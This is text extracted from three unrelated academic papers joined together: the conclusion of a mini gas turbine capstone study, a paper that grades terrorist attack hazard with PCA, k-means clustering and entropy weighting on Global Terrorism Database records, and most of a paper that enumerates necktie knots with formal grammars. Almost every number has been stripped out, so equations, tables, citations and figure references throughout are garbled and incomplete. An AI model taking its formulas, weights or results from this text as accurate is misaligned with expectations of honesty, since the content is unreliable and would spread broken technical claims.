see following report section for mass flow rate governing equations. the fuel flow rate is determined from measuring the fuel pressure. if the fuel pressure as well as the fuel properties are known, the flow rate can be determined. the inlet mass flow rate numeric indicator application of computational tools to analyze and test mini gas turbine value is calculated, not measured. the calculated value is dependent on the measured values of compressor inlet temperature (t ), compressor inlet static pressure (ps), and compressor inlet dynamic pressure (pt-ps). using express formula functions, the density of the air is first calculated, then the velocity of the air is calculated, and finally the inlet mass flow rate can be calculated. the following equations are contained within these functions for density (ρ), velocity (v) and mass flow rate (ṁ). where, a = compressor inlet area r = ideal gas constant for air figure shows the inlet mass flowrate vs. rpm figure. mass flow rate calibration figure. labview block diagram international journal of advanced network monitoring and controls volume , no. , . engineering equation solver (ees) one of the critical tasks was to create a program in ees which analyzes the engine using the first and second laws of thermodynamics. ideally this program would be displayed on the second monitor so you can take the data directly from labview and plug it into the ees program. after plugging in the different temperatures and pressures as inputs in the ees program, it will calculate the compressor efficiency, turbine efficiency, overall efficiency of the engine and the thrust of the engine. a diagram window interface was created in ees to make it easy for the user to run the program without understanding the entirety of the code. figure below shows the equations window section of the ees program. figure. ees code figure. engine testing data plot – thrust vs rpm a sample set of data collected from an engine test run is shown in figure through figure . these plots contain important characteristics of the engine such as the relationship between engine rpm and thrust, temperature, inlet mass flow rate, and pressure. figure. engine testing data plot – inlet mass flow rate vs rpm application of computational tools to analyze and test mini gas turbine . conclusion this paper explored the use of computational tools to enhance the students’ understanding of the different gas turbine engine processes and apply the theory such as conservation of mass and energy which were learned in different courses such as thermodynamics and fluid mechanics. the computational tool such as ees allows the students to focus on the fundamental concepts of energy equation and second law of thermodynamics to yield quicker final results. the completion of this capstone project produced quality and timely task completion. the mini turbine engine is now ready to be used in student experimental settings. each data acquisition component of the system is calibrated including all thermocouples and pressure transducers, rpm measurement and thrust measurement. the labview program will be used for real time data display and data acquisition of the complete run cycle of the system. using this data exported to excel by the labview program, these values can be inputted into the first and second law of thermodynamics ees program to determine the efficiencies of the compressor, turbine, and the overall system as well as the work done by the system in btu/hr. 
the senior students completed their tasks and sub-tasks and achieved their final goal. these tasks and sub- figure. engine testing data plot – pressure vs rpm figure. engine testing data plot – temperature vs rpm international journal of advanced network monitoring and controls volume , no. , tasks include but are not limited to preliminary research and component identification, mounting of a new laptop arm and laptop, design and manufacturing of a mounting bracket for the daq hardware, an ees program, a daq and user-friendly display labview program. it can be concluded that using senior students. feedback from students, proved that the use of computational tools significantly enhances the student learning experience while motivating the students to learn the different mini turbine processes. references [ ] moran, michael j., and howard n. shapiro. fundamentals of engineering thermodynamics. seventh ed. new york: wiley, . print [ ] [ ] owen, j.m., pincombe, j.r. and rogers, r.h., “source-sink flow inside a rotating cylindrical cavity” , j. fluid mech., vol. , , - . [ ] firouzian, m.o., owen, j.m., pincombe, j.r. and rogers, r.h., “flow and heat transfer in a rotating cylindrical cavity with a radial inflow of fluid. part : the flow structure”, int. j. heat and fluid figure. ees code application of computational tools to analyze and test mini gas turbine flow, vol. , , - . [ ] firouzian, m.o., owen, j.m., pincombe, j.r. and rogers, r.h., “ flow and heat transfer in a rotating cylindrical cavity with a radial inflow of fluid. part : velocity, pressure and heat transfer measurements”, int. j. heat and fluid flow, vol. , , - . [ ] chew, j.w., farthing, p.r., owen, j.m. and stratford, b., “ the use of fins to reduce the pressure drop in a rotating cavity with radial inflow”, j. turbomachinery, vol. , , - . [ ] x. liu, “flow in a corotation radial inflow cavity between turbine disk and coverplate”, int. gas turbine & aeroengine congress & exhibition, orlando, florida, . [ ] oliver popp, horst zimmermann, and j. kutz, “ cfd-analysis of coverplate receiver flow”, int. gas turbine & aeroengine congress & exhibition, birmingham,uk, . [ ] haifa el-sadi, grant guevremont, remo marini, sami girgis, “cfd study of hpt blade cooling flow supply systems”, asme turbo expo : power for land, sea and air,may - , , montreal, canada paper title (use style: paper title) international journal of advanced network, monitoring and controls volume , no. , hazard grading model of terrorist attack based on machine learning yu jun school of computer science and technology xi'an technological university xi'an , shaanxi, china e-mail: yujun@xatu.edu.cn xian tong school of computer science and technology xi'an technological university xi'an, , shaanxi, china hu zhiyi institute of engineering design army academy of pla beijing, , china liu yutong engineering design institute army academy of pla beijing, , china abstract—in this paper, there is no unified grading standard for the harm of terrorist attacks. a classification model of terrorist incidents based on machine learning is proposed. first, the data related to the hazard in the global terrorism database (gtd) is extracted and preprocessed. secondly, the data is extracted by principal component analysis, and all events are aggregated into by k-means clustering. again, the entropy method is used to calculate the weighting coefficient of each indicator, and the comprehensive score of the hazard of each type of terrorist attack is calculated. 
finally, the scores are divided into - levels of hazard grading models in order of high to low. the results show that the hazard grading model can scientifically and objectively quantify terrorist attacks. keywords-terrorist attacks; hazard; hierarchical model; principal component analysis; k-means clustering; entropy method i. introduction a terrorist attack is an aggression committed by an extremist or organization that is not in conformity with international morality and is directed against, but not limited to, civilians and civilian installations. it not only has great destructiveness and destructive power, but also directly causes huge casualties and property losses. it also brings tremendous psychological pressure to people, causing a certain degree of turmoil in society and greatly hindering economic development. global terrorism is a phenomenon of public interest, and everyone is directly affected by it. therefore, anti- terrorism work is imminent. big data is now the main source of counter-terrorism intelligence. the global terrorism database (gtd) is the world's most comprehensive database of non-confidential terrorist attacks, containing more than , terrorist attacks, each containing at least variables. an in-depth analysis of data related to terrorist attacks will help deepen people's understanding of terrorism and provide valuable information support for opposing terrorism and preventing terrorism. data collection and preprocessing intelligence are the lifeblood of counter- terrorism work. keeping reliable information in a timely manner can play an active role in combating terrorism and effectively curb the spread of terrorism[ ]. grading catastrophic events (such as earthquakes, traffic accidents, meteorological disasters, etc.) is an important task of social management. the usual grading generally adopts a subjective method, and the authority stipulates the grading standard. the harmfulness of terrorist attacks depends not only on the two aspects of casualties and economic losses, but also on the timing, geography, and targeted objects. therefore, it is difficult to fully reflect these factors. the hazard grading of terrorist incidents can clearly define the future attacks, and different levels of events correspond to different treatments. this will not only help the management of social security, but also avoid unnecessary waste of manpower and property. combined with big data processing technology, this paper establishes a hierarchical model based on pca algorithm, k-meas clustering algorithm and entropy method. first, evaluation indicators related to the hazard of the event were selected to preprocess the doi: . /ijanmc- - international journal of advanced network, monitoring and controls volume , no. , existing data. secondly, the pca method was used to reduce the index from dimensions to dimensions, and the reduced dimension vector was obtained by the clustering algorithm. gather into categories, you can get the category corresponding to each event. finally, using the entropy method to score the hazard of each event and according to the average hazard score of each class. according to the degree of harm from high to low levels to . a hazard grading model of terrorism events is obtained with a hazard rating of . ii. data preprocessing in this paper, the hazard grading model of terrorism events data is established from some important fields of the gtd original database. 
the selected data handling requires missing value processing, conversion of characters to numeric values and numerical processing. a. important field selection the important field of hierarchical is pointed out by the world anti-terrorism incident research. the terrorism hazard classification model data table has selected the following fields from gtd, as shown in table . table i. the selected field table field description extended whether it is a continuous event latitude latitude longitude longitude success successful attack suicide suicide attack nkill total number of deaths propextent degree of property damage nwound total number of injuries country country region area city city attacktype attack type targtype target/victim type weapontype weapon type b. missing value processing in the selected field, python's function dataframe. dropna can delete rows or columns with null values, and retain all data that is not empty. then the character field needs to be converted to a numeric field. c. converting character fields to numeric fields the character field that need to be converted is as follows: ) eventid: events in the gtd are numbered with digits. the first digits are recorded in the format "yyyymmdd". the last digits calibrate the serial number of the day, e.g. , etc. ) country: according to the developed economies assessment standards recognized by the united nations, countries are divided into developed and underdeveloped countries. since terrorist attacks are more harmful to developed countries, the relevant assignments are shown in table . . ) region: count the frequency of terrorist incidents in each region and assign the frequency to regional indicator values. ) city: the world city is divided into three levels: the capital, the provincial capital, and other cities. since the terrorist attacks are more harmful to the political and economic centers, the relevant assignments are shown in table . . ) attack type: counting the frequency of occurrence of types of attacks, and assigning the frequency to the attack type indicator value. ) weapon type: counting the frequency of occurrence of weapon types, and assigning this frequency to the weapon type indicator value. ) targtype: counting the frequency of occurrence of target types, and assigning this frequency to the target type indicator value. table ii. the state and city assignment index assignment developed countries underdeveloped countries the capital the provincial capital other cities international journal of advanced network, monitoring and controls volume , no. , d. numerical processing in the original gtd database, the nkill field includes the number of all victims and terrorists who directly caused death from terrorist incidents. we use only requires the number of victims and does not require the death toll of terrorists. therefore, the number of victims is obtained by subtracting the number of terrorist deaths (nkiller) from the total number of deaths. iii. terrorist attack hazard classification model in this paper, the pca algorithm, k-means clustering algorithm and entropy method are used to classify the terrorist attacks. the process of building a hierarchical model is divided into four steps: ) the indicators with greater influence is standardized by pca algorithm. we construct a - dimensional matrix, and then reduce the matrix from dimensions to dimensions. ) the k-means algorithm is used to cluster all the terrorist events in the matrix into five major categories, i.e. five hazard levels. 
) using the entropy weight method finds the weights of each of the indicators, and then weighting and summing the indicators of each event to obtain the score of the event. for each hazard level, finding the average score for all events is at that level. ) sorting by the average scores of the five hazard levels, we divide them into one to five grades from high to low. the higher score means the greater damage. a. using the pca algorithm for dimensional reduction principal component analysis (pca) extracts m- dimensional feature matrices from n-dimensional matrices. first, we calculates eigenvalues and eigenvectors of n-dimensional matrices. according to the order of pca eigenvalues from large to small, we select the corresponding first m eigenvectors., and then obtain an n*m feature transformation matrix t. in this paper, n= , m= . the dimensionality reduction is completed.[ ] the order of pca eigenvalues generated by indicators from large to small is shown in table . table iii. characteristic values corresponding to the indicators indicators characteristic values nkill . e- nwound . e- targtype . e- country . e- attacktype . e- region . e- suicide . e+ city . e- longitude . e+ extended . e+ latitude . e+ propextent . e- success . e+ weapontype . e+ in this paper, data is reduced by the pca algorithm, i.e. the original -dimensional matrix    x = x ,x ,x ,x ,x ,x ,x ,x ,x ,x ,x ,x ,x ,x is reduced to a - dimensional matrix y = y ,y ,y ,y   . the corresponding contribution degrees of the -dimensional feature vectors are: . , . , . , . , and the sum is greater than . . therefore, the dimension-reduced matrix preserves most of the original data and can be directly used for clustering. b. using k-means algorithm for hazard classification the main idea of the k-means clustering algorithm is to cluster a number of discrete data points with k centroids and divide them into k clusters to distinguish data points with less similarity. sum of the squared error (sse) is the objective function of clustering, and classify data points with similar similarity into one class. the method finally converges to the optimal solution by continuously updating the centroid attribution and centroid position of the data points[ ]. the algorithm process is as follows: ) we select event objects as the initial cluster center. ) we calculate the euclidean distance from each event to each cluster center and assign this event to the nearest cluster. ) after all the event assignments are completed, the five cluster centers are recalculated, and compared with the cluster center obtained in the previous calculation. if the cluster center changes, the euclidean distance and the assigned category are recalculated. international journal of advanced network, monitoring and controls volume , no. , ) when the cluster center does not change, the clustering result is directly output. calculate the cluster center to which each type of event belongs, as shown in table . table iv. table . clustering center for event classification type x x x x numbers . - . - . . - . . - . . . . . - . . - . . - . - . . . - . the formula for calculating each event category is as shown in equations ( ) to ( ).         ( . ) ( . ) ( . ) ( . )d y y y y            ( . ) ( . ) ( . ) ( . )d y y y y           ( . ) ( . ) ( . ) ( . )d y y y y   ( . ) ( . ) ( . ) ( . )d y y y y                   ( . ) ( . ) ( . ) ( . 
)d y y y y    i min min{d ,d ,d ,d ,d }   among them is y = y ,y ,y ,y   the feature component vector after dimension reduction by pca algorithm. di is the euclidean distance between the dimension vector and the five cluster centers. mini is the minimum euclidean distance, and i is the final event category. c. using entropy method for calculating weight coefficient the entropy method is a mathematical method used to determine the degree of dispersion of an indicator. with the great degree of dispersion comes great impact of the comprehensive evaluation of the indicator. the entropy value can be used to determine the degree of dispersion of an indicator. the steps of calculating the weight coefficient by the entropy method are as follows: ) we select indicators of events, and use xij to indicate the index value of the i-th indicator in the j-th terrorist attack. );;( n ,, ; ,, i  mj  ) normalization of indicators is normalized processing. the absolute values of the indicators are conversed into relative values. it has different representative meanings that the positive indicator and the negative indicator value (the higher the positive indicator value is the better), the lower the negative indicator value is the better), as shown in equation ( ) and equation ( ).     ' min{ ,... } max{ ,..., } min{ ,..., } ij ij nj ij j nj j nj x x x x x x x x       ' max{ ,... } max{ ,..., } min{ ,..., } j nj ij ij j nj j nj x x x x x x x x   ) calculating the proportion of the i-th event in the j-th index are shown in equation .     n i ij ij ij x x p   ) calculating the entropy value of the j-th indicator, are shown in equation .  )nln(/ k ),ln(e     j n i ijijj eppk   ) calculating the information entropy redundancy are shown in equation .  jj e d   ) calculating the weights of each indicator are shown in equation .     m j j j j d d w   ) calculating the hazard weighting value of each event are shown in equation . international journal of advanced network, monitoring and controls volume , no. ,      m j iji w j xs   the weighting factors for each indicator are shown in table . table v. table . weight coefficients of each indicator indicator x x x x x x x weight . . . . . . . indicator x x x x x x x weight . . . . . . . d. hazard grading result all events can be divided into five hazard levels by pca and k-means clustering. the hazard score of each event is obtained by entropy method, and the average value of the hazard score of each type of event is obtained. after sorting the average, the five hazard levels are shown in table . table vi. table . hazard grading result hazard level cluster category hazard level . . . - . - . iv. conclusion in this paper, categories related to hazard are selected from the global terrorism database (gtd) for the hazard grading of terrorist attacks; after pre- processing the data used, through principal component analysis (pca) the related data is used for feature extraction. the k-means clustering method aggregates all events into five categories. the entropy method calculates the weight coefficient of each indicator, and finally obtains the comprehensive score of the harm of each type of attack. 
according to the comprehensive scores of the five types of attacks, a graded to five- level classification model was obtained. this model quantifies the relevant data of past terrorist attacks, and the obtained model has objectivity. it is necessary to establish more detailed grading standards. reference [ ] sanjun nie. research on counter-terrorism based on big data[a]. ieee beijing section. proceedings of ieee international conference on big data analysis (icbda) [c]. ieee beijing section: ieee beijing section institute of electrical engineers beijing branch), : . [ ] strang, kenneth david & sun, zhaohao. ( ). analyzing relationships in terrorism big data using hadoop and statistics. journal of computer information systems. . - . . / . . .k. elissa, “title of paper if known,” unpublished. [ ] li wei. characteristics and trends of current international terror and anti-terrorism struggle [j]. modern international relations, ( ): - . [ ] yu yihan, fu wei, wu xiaoping. privacy data metric and hierarchical model based on shannon information entropy and bp neural network[j].journal of communications, , ( ) [ ] he jing. research and analysis of future anti-terrorism situation based on big data[j]. economic research guide, ( ): - . [ ] wang qi, li xiaopei, dong xinyan. classification model of wine grape based on principal component analysis[j]. china high-tech zone, ( ): . [ ] wang chao, yao min, fu zhanzhan. research on emergency classification based on fuzzy comprehensive evaluation[j].software guide, ( ): - [ ] lu ronghui. terrorism and counter-terrorism in the context of globalization [d]. suzhou university, . [ ] wang chao, yao min, fu zhanzhan. research on emergency classification based on fuzzy comprehensive evaluation[j].software guide, , ( ): - . [ ] hou wenjing, jiang xinxin, wen hong, lei wenxin, xu aidong. terminal security level grading model of bp neural network based on edge side[j].communication technology, , ( ): - . [ ] shi ya, wang xiuhua, yang wei, liu li, tan zhezhen, ouyang wei. study on the grading strategy of comprehensive evaluation model for long-term care of the elderly[j]. chinese journal of nursing, , ( ): - more ties than we thought submitted february accepted may published may corresponding author mikael vejdemo-johansson, mvj@kth.se academic editor anne bergeron additional information and declarations can be found on page doi . /peerj-cs. copyright hirsch et al. distributed under creative commons cc-by . open access more ties than we thought dan hirsch , ingemar markström , meredith l. patterson , anders sandberg and mikael vejdemo-johansson , , upstanding hackers inc. kth royal institute of technology, stockholm, sweden oxford university, uk jožef štefan institute, ljubljana, slovenia institute for mathematics and its applications, minneapolis, usa abstract we extend the existing enumeration of neck tie-knots to include tie-knots with a textured front, tied with the narrow end of a tie. these tie-knots have gained popularity in recent years, based on reconstructions of a costume detail from the matrix reloaded, and are explicitly ruled out in the enumeration by fink & mao ( ). we show that the relaxed tie-knot description language that comprehensively describes these extended tie-knot classes is context free. it has a regular sub-language that covers all the knots that originally inspired the work. from the full language, we enumerate , distinct tie-knots that seem tie-able with a normal neck-tie. 
out of these , , we also enumerate , tie-knots that belong to the regular sub-language. subjects algorithms and analysis of algorithms, computational linguistics, theory and formal methods keywords necktie knots, formal language, automata, chomsky hierarchy, generating functions introduction there are several different ways to tie a necktie (fig. ). classically, knots such as the four-in-hand, the half windsor and the full windsor have commonly been taught to new tie-wearers. in a sequence of papers and a book, fink & mao ( ), fink & mao ( ) and fink & mao ( ) defined a formal language for describing tie-knots, encoding the topology and geometry of the knot tying process into the formal language, and then used this language to enumerate all tie-knots that could reasonably be tied with a normal-sized necktie. the enumeration of fink and mao crucially depends on dictating a particular finishing sequence for tie-knots: a finishing sequence that forces the front of the knot—the façade—to be a flat stretch of fabric. with this assumption in place, fink and mao produce a list of distinct tie-knots, and determine several novel knots that extend the previously commonly known list of tie-knots. in recent years, however, interest has been growing for a new approach to tie-knots. in the matrix reloaded (wachowski et al., ), the character of “the merovingian” has a sequence of particularly fancy tie-knots. attempts by fans of the movie to recreate the tie-knots from the merovingian have led to a collection of new tie-knot inventions, all of which rely on tying the tie with the thin end of the tie—the thin blade. doing this allows for how to cite this article hirsch et al. ( ), more ties than we thought. peerj comput. sci. :e ; doi . /peerj-cs. mailto:mvj@kth.se https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure some specific tie-knot examples. top row from left: the trinity (l- . ), the eldredge (l- . ) and the balthus (c- . , the largest knot listed by fink and mao). bottom row randomly drawn knots. from left: l- . , l- . , r- . . a knot with textures or stylings of the front of the knot, producing symmetric and pleasing patterns. knorr ( ) gives the history of the development of novel tie-knots. it starts out in when the edeity knot is published as a pdf tutorial. over the subsequent years, more and more enthusiasts involve themselves, publish new approximations of the merovingian tie-knot as pdf files or youtube videos. by , the new tie-knots are featured on the website lifehacker and go viral. in this paper, we present a radical simplification of the formal language proposed by fink and mao, together with an analysis of the asymptotic complexity class of the tie-knots language. we produce a novel enumeration of necktie-knots tied with the thin blade, and compare it to the results of fink and mao. formal languages the work in this paper relies heavily on the language of formal languages, as used in theoretical computer science and in mathematical linguistics. for a comprehensive reference, we recommend the textbook by sipser ( ). recall that given a finite set l called an alphabet, the set of all sequences of any length of items drawn (with replacement) from l is denoted by l∗. a formal language on the alphabet l is some subset a of l∗. 
the complexity of the automaton required to determine whether a sequence is an element of a places a in one of several complexity classes. languages that are described by finite state automata are regular; languages that require a pushdown automaton are context free; languages that require a linear bounded automaton are context sensitive and languages that require a full turing machine to determine are called recursively enumerable. this sequence builds an increasing hierarchy of expressibility and computational complexity for syntactic rules for strings of some arbitrary sort of tokens. hirsch et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. l r c t w thin blade broad blade ba figure left/center/right. the parts of a necktie, and the division of the wearer’s torso with the regions (left, center right) and the winding directions (turnwise, widdershins) marked out for reference. one way to describe a language is to give a grammar—a set of production rules that decompose some form of abstract tokens into sequences of abstract or concrete tokens, ending with a sequence of elements in some alphabet. the standard notation for such grammars is the backus–naur form, which uses ::= to denote the production rules and ⟨some name⟩ to denote the abstract tokens. further common symbols are ∗, the kleene star, that denotes an arbitrary number of repetitions of the previous token (or group in brackets), and |, denoting a choice of one of the adjoining options. the anatomy of a necktie in the following, we will often refer to various parts and constructions with a necktie. we call the ends of a necktie blades, and distinguish between the broad blade and the thin blade —see fig. for these names. the tie-knot can be divided up into a body, consisting of there are neckties without a width difference between the ends. we ignore this distinction for this paper. all the twists and turns that are not directly visible in the final knot, and a façade, consisting of the parts of the tie actually visible in the end. in fig. we demonstrate this distinction. the body builds up the overall shape of the tie-knot, while the façade gives texture to the front of the knot. the enumeration of fink and mao only considers knots with trivial façades, while these later inventions all consider more interesting façades. as a knot is in place around a wearer, the y-shape of the tie divides the torso into regions: left, center and right—as shown to the right in fig. . a tie-knot has to be tied by winding and tucking one of the two blades around the other: if both blades are active, then the tie can no longer be adjusted in place for a comfortable fit. we shall refer to the blade used in tying the knot as the leading blade or the active blade. each time the active blade is moved across the tie-knot—in front or in back—we call the part of the tie laid on top of the knot a bow. a language for tie-knots fink & mao ( ) observe that once the first crossing has been made, the wrapping sequence of a classical tie-knot is completely decided by the sequence of regions into which the broad blade is moved. adorning the region specifications with a direction—is the tie moving away from the wearer or towards the wearer—they establish a formal alphabet for describing tie-knots with symbols. we reproduce their construction here, using u for the hirsch et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. 
figure different examples of tie knots. left, a -in-hand; middle, a double windsor; right a trinity. the -in-hand and double windsor share the flat façade but have different bodies producing different shapes. the trinity has a completely different façade, produced by a different wind and tuck pattern. move to tuck the blade u nder the tie itself. the notation proposed by fink & mao ( ) fink and mao used t for tuck. interprets repetitions u k of u as tucking the blade k bows under the top. it turns out that the complexity analysis is far simpler if we instead write u k for tucking the blade under the bow that was produced k windings ago. this produces a language on the alphabet: {l⊗,l⊙,c⊗,c⊙,r⊗,r⊙,u} they then introduce relations and restrictions on these symbols: t ie no region (l,c,r) shall repeat: after an l only c or r are valid next regions. u moves do not influence this. t ie no direction (⊙—out of the paper, ⊗—in towards the paper) shall repeat: after an outwards move, the next one must go inwards. u moves do not influence this. t ie tucks (u ) are valid after an outward move. t ie a tie-knot can end only on one of c⊗,c⊙ or u . in fact, almost all classical knots end on u . the exemption here being the onassis style knot, favored by the eponymous shipping magnate, where after a classical knot the broad blade is brought up with a c⊙ move to fall in front of the knot, hiding the knot completely. t ie a k-fold tuck u k is only valid after at least k preceding moves. fink & mao ( ) do not pay much attention to the conditions on k-fold tucks, since these show up in their enumeration as stylistic variations, exclusively at the end of a knot. this collection of rules allow us to drastically shrink the tie language, both in alphabet and axioms. fink & mao are careful to annotate whether tie-knot moves go outwards or inwards at any given point. we note that the inwards/outwards distinction follows as a direct consequence of axioms t ie , t ie and t ie . since non-tuck moves must alternate between inwards and outwards, and the last non-tuck move must be outwards, the orientation of any sequence of moves follows by backtracking from the end of the string. hence, when faced with a non-annotated string like rclcrclcrclrurclu hirsch et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. we can immediately trace from the tail of the knot string: the last move before the final tuck must be outwards, so that l must be a l⊙. so it must be preceded by r⊙c⊗. tracing backwards, we can specify the entire string above to r⊗c⊙l⊗c⊙r⊗c⊙l⊗c⊙r⊗c⊙l⊗r⊙uc⊗r⊙c⊗l⊙u next, the axiom t ie means that a sequence will not contain either of lu∗l,cu∗c,ru∗r as subsequences. hence, the listing of regions is less important than the direction of recall that the kleene star f∗ is used to denote sequences of or more repetitions of the string f. transition: any valid transition is going to go either clockwise or counterclockwise. say, as seen on the mirror image. changing this convention does not change the count, as long as the change is consequently done. writing t for clockwise and w for counterclockwise, we can give a strongly reduced t for turnwise. w for widdershins. tie language on the alphabet t, w, u. to completely determine a tie-knot, the sequence needs a starting state: an annotation on whether the first crossing of a tie-knot goes across to the right or to the left. 
in such a sequence, a u instruction must be followed by either t or w dictating which direction the winding continues after the tuck, unless it is the last move of the tie: in this case, the blade is assumed to continue straight ahead—down in front for most broad-blade tie-knots, tucked in under the collar for most thin-blade knots. the position of the leading blade after a sequence of w/t windings is a direct result of #w − #t(mod ). this observation allows us to gain control over several conditions determining whether a distribution of u symbols over a sequence of w/t produces a physically viable tie-knot. theorem . a position in a winding sequence is valid for a k-fold tuck if the sub-sequence of the last k w or t symbols is such that either . starts with w and satisfies #w − #t = (mod ) . starts with t and satisfies #t − #w = (mod ). proof. the initial symbol produces the bow under which the tuck will go. if the initial symbol goes, say, from r to l, then the tuck move needs to come from c in order to go under the bow. in general, a tuck needs to come from the one region not involved in the covering bow. every other bow goes in front of the knot, and the others go behind the knot. hence, there are k − additional winding symbols until the active blade returns to the right side of the knot. during these k − symbols, we need to transition one more step around the sequence of regions. the transitions w and t are generator and inverse for the cyclic group of order , concluding the proof. � it is worth noticing here that a particular point along a winding can be simultaneously valid for both a k-fold and an m-fold tuck for k ≠ m. one example would be in the winding string twtt: ending with tt, it is a valid site for a -fold tuck producing twttu, and since twtt starts with t and has more t than w, it is also a valid site for a -fold tuck producing twttuu. we will revisit this example below, in ‘recursive tucks.’ we may notice that with the usual physical constraints on a tie—where we have experimentally established that broad blade ties tend to be bounded by moves, and thin blade ties by moves, we can expect that no meaningful tuck deeper than will ever hirsch et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. be relevant; for the broad blade ties. the bound of is achieved in the enumeration by fink & mao ( ). in our enumeration, we will for the sake of comfort focus on ties up to moves. language complexity in this section, we examine the complexity features of the tie-knot language. due to the constraints we have already observed on the cardinality of w and t, we will define a grammar for this language. we will write this grammar with a backus–naur form. although in practice it is only possible to realise finite strings in the tie-knot language due to the physical properties of fabric, we assume an arbitrarily long (but finite), infinitely thin tie. single-depth tucks the classical fink and mao system has a regular grammar, given by ⟨tie⟩ ::= l⟨l⟩ ⟨lastr⟩ ::= l⟨lastl⟩ | c⟨lastc⟩ | lcu ⟨lastl⟩ ::= r⟨lastr⟩ | c⟨lastc⟩ | rcu ⟨lastc⟩ ::= l⟨lastl⟩ | r⟨lastr⟩ we use the symbol ⟨lastr⟩ to denote the rule that describes what can happen when the last move seen was an r. hence, at any step in the grammar, some tie knot symbol is emitted, and the grammar continues from the state that symbol was the last symbol emitted. the above grammar works well if the only tucks to appear are at the end. 
for intermediate tucks, and to avoid tucks to be placed at the back of the knot (obeying t ie ), we would need to keep track of winding parity: tucks are only valid an even number of winding steps from the end. we can describe this with a regular grammar. for the full tie-knot language, the grammar will end up context-free, as we will see in ‘recursive tucks.’ ⟨tie⟩ ::= ⟨prefix⟩(⟨pair⟩ | ⟨tuck⟩) ∗ ⟨tuck⟩ ⟨prefix⟩ ::= t | w | ϵ ⟨pair⟩ ::= (t|w)(t|w) ⟨tuck⟩ ::= ttu | wwu the distribution of t and w varies by type of knot: for classical knots, #w − #t = (mod ); for modern knots that tuck to the right, #w − #t = (mod ); and for modern knots that tuck to the left, #w − #t = (mod ). this grammar does not discriminate between these three sub-classes. in order to track these sub-classes, the rlc-notation is easier. in order to rebuild this grammar to one based on the rlc-notation, note that from l a t takes us to c and a w takes us to r. so from a ⟨lastt⟩ residing at l, we have the options: w to hirsch et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. r, t to c, or tu to c. in particular, there is a ⟨lastt⟩ at l if we arrived from r. hence, the tu option can be seen as being a ttu option executing from the preceding r state. there is thus, at any given position in the tie sequence, the options of proceeding with a t or a w, or to proceed with one of ttu or wwu. in the latter two cases, we can also accept the string. starting at l, these options take us—in order—to c, to r, to cru and to rcu respectively. this observation extends by symmetry to all stages, giving the grammar below. ⟨lastr⟩ ::= lr⟨lastr⟩ | cr⟨lastr⟩ | lc⟨lastc⟩ | cl⟨lastl⟩ | lcu[⟨lastc⟩] | clu[⟨lastl⟩] ⟨lastl⟩ ::= rl⟨lastl⟩ | cl⟨lastl⟩ | rc⟨lastc⟩ | cr⟨lastr⟩ | rcu[⟨lastc⟩] | cru[⟨lastr⟩] ⟨lastc⟩ ::= lc⟨lastc⟩ | rc⟨lastc⟩ | lr⟨lastr⟩ | rl⟨lastl⟩ | lru[⟨lastr⟩] | rlu[⟨lastl⟩] ⟨tie⟩ ::= l(⟨lastl⟩ | r⟨lastr⟩ | c⟨lastc⟩) by excluding some the exit rules, this allows us to enumerate novel tie-knots with a specific ending direction, which will be of interest later on. recursive tucks we can write a context-free grammar for the arbitrary depth tuck tie-knots. ⟨tie⟩ ::= ⟨prefix⟩(⟨pair⟩ | ⟨tuck⟩) ∗ ⟨tuck⟩ ⟨prefix⟩ ::= t | w | ϵ ⟨pair⟩ ::= (t|w)(t|w) ⟨tuck⟩ ::= ⟨ttuck ⟩ | ⟨wtuck ⟩ ⟨ttuck ⟩ ::= tt⟨w ⟩u | tw⟨w ⟩u ⟨wtuck ⟩ ::= ww⟨w ⟩u | wt⟨w ⟩u ⟨w ⟩ ::= ww⟨w ⟩u | wt⟨w ⟩u | tw⟨w ⟩u|tt⟨w ⟩u | ⟨ttuck ⟩’⟨w ⟩u | ⟨wtuck ⟩’⟨w ⟩u | ϵ ⟨w ⟩ ::= ww⟨w ⟩u | wt⟨w ⟩u | tw⟨w ⟩u|tt⟨w ⟩u | ⟨ttuck ⟩’⟨w ⟩u | ⟨wtuck ⟩’⟨w ⟩u ⟨w ⟩ ::= ww⟨w ⟩u | wt⟨w ⟩u | tw⟨w ⟩u|tt⟨w ⟩u | ⟨ttuck ⟩’⟨w ⟩u | ⟨wtuck ⟩’⟨w ⟩u note that the validity of a tuck depends only on the count of t and w in the entire sequence comprising the tuck, and not the validity of any tucks recursively embedded into it. for instance, twtt is a valid depth- -tuckable sequence, as is its embedded depth- -tuckable sequence tt. however, ttwt is also a valid depth- -tuckable sequence, even though wt is not a valid depth- -tuckable sequence. we introduce the symbol ’ to delineate different tucks that may come in immediate sequence, such as happens in the tie knot twttu’uu. hirsch et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. 
classification of the tie-knot language if we limit our attention to only the single-depth tie-knots described in ‘single-depth tucks,’ then the grammar is regular, proving that this tie language is a regular language and can be described by a finite automaton. in particular this implies that the tie-knot language proposed by fink & mao ( ) is regular. in fact, an automaton accepting these tie-knots is given by: after the prefix, execution originates at the middle node, but has to go outside and return before the machine will accept input. this maintains the even length conditions required by t ie . as for the deeper tucked language in ‘recursive tucks’, the grammar we gave shows it to be at most context-free. whether it is exactly context-free requires us to exclude the existence of a regular grammar. theorem . the deeper tucked language is context-free. proof. our grammar in ‘recursive tucks’ already shows that the language for deeper tucked tie-knots is either regular or context-free: it produces tie-knot strings with only single non-terminal symbols to the left of each production rule. it remains to show that this language cannot be regular. to do this, we use the pumping lemma for regular languages. recall that the pumping lemma states that for every regular language there is a constant p such that for any word w of length at least p, there is a decomposition w = xyz such that |xy| ≤ p, |y| ≥ and xyiz is a valid string for all i > . since the reverse of any regular language is also regular, the pumping lemma has an alternative statement that requires |yz| ≤ p instead. we shall be using this next. 